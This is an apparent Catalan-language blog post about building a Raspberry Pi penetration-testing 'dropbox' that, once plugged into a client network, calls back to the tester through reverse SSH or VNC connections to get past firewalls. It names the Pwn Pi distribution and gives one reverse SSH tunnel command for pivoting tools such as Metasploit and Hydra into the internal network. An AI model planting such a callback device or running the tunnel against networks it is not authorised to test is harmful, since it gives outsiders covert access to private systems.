Iniciant el projecte: Raspberry pi com a Pentest dropbox

Ja he iniciat el projecte, i fet forces avanços, trobats inconvenients i cercant com sortejar-los… total que estic aprenent molt i cada cop soc més fan de la Raspberry Pi!

Si recordeu, el projecte era crear amb la Rapsberry Pi una dropbox per a fer pentest, és a dir, que la Rapsberry un connectada a la xarxa del client ens obris una backdoor cap a nosaltres tot comprometent la xarxa objectiu i saltant-nos així qualsevol router, firewall i filtatge existent. Per a saltar-nos els filtres, tal com proxys, caldrà refinar una mica les configuracions, igualment si la xarxa utilitza IP estàtiques, etc però l’objectiu està molt clar i és molt engrescador.

ImatgeEl primer que he trobat és una distribució ja feta expressament per a convertir la Rasperry Pi en una eina de pentest.  Es tracta de Pwn Pi.

Aquesta distribució porta moltes eines interesants per a fer pentest, des de sqlmap, nmap, metasploit… per comentar-ne algunes.  Tanmateix en les proves que he fet he de dir que el metasploit (console) no carrega, o si més no triga una eternitat (als 15 minuts ja vaig desesperar).

Aquesta distribució també porta integrats uns scripts per a crear connexions inverses, i per tant s’acosta a l’objectiu que tenia proposat.  Simplement tocant l’arxiu /pwnpi.cong i indicant la IP del nostre ordinador i el port on s’ha de connectar, la Raspberry Pi llençarà una connexió SSH o VNC (depenent de què haguem configurat) cada x minuts.

En aquest escenari aconseguiríem un infiltrat dins de la xarxa del client, amb una connexió que si no ha estat filtrada ens permetrà treballar remotament amb la Raspberry Pi i per tant llençar atacs a la xarxa.  Tanmateix estem limitats (i molt) per la potencia de la Raspberry Pi i les eines que tinguem instal·lades.  És impossible doncs fer un anàlisis amb Nessus, llançar el Metasploit, etc.

Com ho resolem?

Tenim variem opcions, però bàsicament el que busquem és utilitzar la Paspberry per a pivotar les comunicacImatgeions.  Potser la més simple és aconseguint que la Paspberry crei un túnel SSH invers i des de el nostre Pc de sobretaula puguem redirigir el tràfic de les nostres eines de pentest cap aquest túnel.  Amb aquesta idea podríem treballar amb Metasploit o llençar el Hydra amb tota la potència del nostre Pc llançant l’atac a la xarxa interna del client mitjançant aquest túnel i no dependre tant de les limitacions de la Raspberry.

Per a fer això bàsicament podem utilitzar una comanda com aquesta a la Raspberry Pi:

ssh -R 1980:localhost:22 root@some-pc-client

Tenint el servidor SSH en el nostre Pc de sobretaula (i el corresponent port 22 redirigit al router) aquesta comanda ens obrirà un port 1980 on tot el que entri es redirigirà cap a la Raspberry Pi

Ara encara em calen fer proves, el més real possibles, però la idea general és aquesta.

Advertisements

~ per madyyelf a 14 Març 2013.